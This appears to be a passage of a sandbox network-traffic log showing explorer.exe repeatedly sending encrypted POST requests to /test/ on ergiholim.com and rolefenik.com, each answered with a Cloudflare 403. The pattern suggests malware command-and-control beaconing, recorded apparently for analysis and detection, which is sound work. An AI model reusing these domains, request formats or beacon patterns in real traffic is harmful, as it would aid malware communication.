                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.650004104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:59 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:59 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:00 UTC751INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:00 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQD624mIiNghgpFyZzAJprJzLc%2FnDTRsb%2F9vcol2RdUwLvH1obq%2F2iNyGPlpoANo9JUvTVepMdcZuMUyJha%2FxnNBAUhibILuNXTSjsT4a2fwkn5kJXMW%2BiELaIrFARHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070fe6846c9ac-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=39041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=74193&cwnd=32&unsent_bytes=0&cid=2777bdb7e1b369c5&ts=279&x=0"
                                                                                                                                          2024-11-13 17:22:00 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.650005104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:00 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:00 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:01 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GL2Q%2FbhasOF6DcdYDAG22sB6BgF7M1fiSewuc5IKjkh720Apo6m72liNiuOrGCtTwEKZTRgw3k2zrRV%2Fnasdf1DHW0tE%2Bx%2BJ%2BKIbjEoULnDAIcmci%2FmwoNyMzwLjmhtr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071049970c958-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41232&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=70258&cwnd=32&unsent_bytes=0&cid=c2dd190e565dc61d&ts=278&x=0"
                                                                                                                                          2024-11-13 17:22:01 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.650006104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:01 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:01 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:02 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1r2nLgGaylcA0qilBncljS4QWx9udQXuiUu0umAnEBz8XwZLVHWX2w%2FByQfOFetFPg95t7b9vT3QEp8XEvQQsnV4OH76bKcvhibOFumd2xbFh0zFM9%2FL5QL50bTapSIG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20710a29e56c6f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2623188&cwnd=251&unsent_bytes=0&cid=c8c2661e3f37bc44&ts=434&x=0"
                                                                                                                                          2024-11-13 17:22:02 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.650007104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:02 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:02 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:03 UTC745INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kf6QbVzs01IjXub4ChxAKfDqBBewWhxpj0OU4jKpQURmVJpn%2FkeNDPTSkJ5WYbRWttQkV2j4W7SFGjaaxTjmDMpibkjGIzNHqoLpOIQ081l8i8qbbyZHDqzmX7ishTPl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207110ae07e9bd-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1386&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1937123&cwnd=251&unsent_bytes=0&cid=2093097d31608b02&ts=397&x=0"
                                                                                                                                          2024-11-13 17:22:03 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.650008104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:04 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:04 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:04 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:04 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3fn6QlD2ADnShiWkE7w%2BJgQac5zJ%2BB6rhtjX0EQfbKg2CxsmZjEIDRBGDtgykuPhApt6AecT3sXIMu8UticN5FHLEAbb78PBgAa1vUAN3SE9AloGRkEJc1%2B9KsAhO4N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20711a8cf3e391-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137358&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20796&cwnd=32&unsent_bytes=0&cid=91d7355ee9d871b5&ts=679&x=0"
                                                                                                                                          2024-11-13 17:22:04 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.650010104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:06 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:06 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:07 UTC745INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:07 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJVKZW4WVYHSwB3cEEmLlOaCV0NZl%2F207pk4vzqookWLiCiuoS3tVCo81D9CazJPEQWgAioJCt4bpFvoKO99GOCXYfupemqmmIhRmo89yzWRJATKduvwPjTzHtguyxXl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207128add6f6c1-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=129983&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22284&cwnd=32&unsent_bytes=0&cid=aba79aad9062ef68&ts=1523&x=0"
                                                                                                                                          2024-11-13 17:22:07 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.650011104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:08 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:08 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:09 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IB5NDGGVo3QHHbPb3wYUOOJsJ7BntS7XQYNbHsQOlk9FJnD0bNMKpm%2BZ0RliYCh2bvZqyFBityTt2PBaLHwnpGIZPxhrFncE%2F13DBsEx2%2FDl5osV8T9uSV2E2g%2Bc071z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207132da6a736e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
